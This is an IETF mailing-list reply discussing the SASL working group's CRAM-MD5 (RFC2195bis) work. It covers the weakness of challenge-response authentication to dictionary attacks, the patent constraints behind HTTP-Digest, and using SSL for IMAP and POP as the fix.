> From: Christian Huitema [mailto:huitema@xxxxxxxxxxxxxxxxxxxxx] > > From: Kurt D. Zeilenga [mailto:Kurt@xxxxxxxxxxxx] At 04:07 PM > > 9/7/2006, John C Klensin wrote: > > >I think we have a small misunderstanding here. Let me say more > > >clearly and briefly > > > > My message was intended to clarify why the SASL WG is pursuing an > > Informational recommendation for its RFC2195bis work and to > redirect > > any comments specific to this work to the WG's list. > > Well, if I remember correctly, there was ample discussion of > this topic during the IETF meeting in Paris -- both Steve > Bellovin and I presented the issues with such techniques. > Basic challenge response mechanisms like CRAM-MD5 are simply > too weak to be used on the Internet. They are subject to > dictionary attacks, which can retrieve the password in a very > short time. They don't deserve much more than documentation > for historical purpose. HTTP-Digest was designed under the constraint that it had to be patent royalty free. At the time every form of public key cryptography including Diffie Hellman was under patent. They are only useful if you have a strong password. Unfortunately the mechanisms for password exchange that are not subject to dictionary attacks are generally considered to be encumbered as well. The solution to this particular problem is to use SSL as the transport. IMAP and POP both support this use. It is a trivial matter to discover that IMAPS is supported using an SRV record. If the will is there this is all fixable. Phill _______________________________________________ Ietf@xxxxxxxx https://www1.ietf.org/mailman/listinfo/ietf